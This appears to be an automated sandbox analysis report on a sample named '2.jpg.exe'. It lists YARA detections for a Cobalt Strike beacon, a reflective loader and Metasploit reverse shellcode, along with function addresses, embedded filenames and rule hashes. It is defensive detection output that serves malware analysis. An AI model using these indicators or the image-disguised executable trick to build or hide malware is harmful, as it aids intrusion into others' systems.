Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 Author: unknown
Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 Author: unknown
Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\2.jpg.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06763E1F GetLastError,_memset,_memset,GetCurrentDirectoryW,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,CreateProcessWithLogonW,GetLastError,GetLastError,GetLastError,_memset,GetLastError,GetLastError,

0_2_06763E1F

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0678267D	0_2_0678267D
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06781E9D	0_2_06781E9D
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06784C40	0_2_06784C40
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06777C14	0_2_06777C14
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06782271	0_2_06782271
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06785210	0_2_06785210
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06782A9D	0_2_06782A9D
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06772BF1	0_2_06772BF1
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_067843C0	0_2_067843C0
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_067849E5	0_2_067849E5
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_067819C8	0_2_067819C8
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_05F300B5	0_2_05F300B5
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06380E05	0_2_06380E05
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0638464D	0_2_0638464D
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_063816AE	0_2_063816AE
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06381EDA	0_2_06381EDA
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_063927F1	0_2_063927F1
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06381ABA	0_2_06381ABA
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_063812DA	0_2_063812DA
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0637202E	0_2_0637202E
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0638407D	0_2_0638407D
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06377051	0_2_06377051

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: String function: 067781DC appears 39 times
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: String function: 06377619 appears 35 times

Source: 2.jpg.exe, 00000000.00000002.4124429713.000000000099E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 2.jpg.exe
Source: 2.jpg.exe, 00000000.00000000.1672509121.0000000000292000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLoadByDF.exe2 vs 2.jpg.exe
Source: 2.jpg.exe, 00000000.00000002.4124836777.00000000026C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameByDll.dll, vs 2.jpg.exe
Source: 2.jpg.exe, 00000000.00000002.4125783535.0000000005F20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameByDll.dll, vs 2.jpg.exe
Source: 2.jpg.exe	Binary or memory string: OriginalFilenameLoadByDF.exe2 vs 2.jpg.exe

Source: 2.jpg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Shellcode.Generic, fingerprint = 834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4, id = 8c487e57-4b8c-488e-a1d9-786ff935fd2c, last_modified = 2022-07-18
Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Shellcode.Generic, fingerprint = 834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4, id = 8c487e57-4b8c-488e-a1d9-786ff935fd2c, last_modified = 2022-07-18
Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
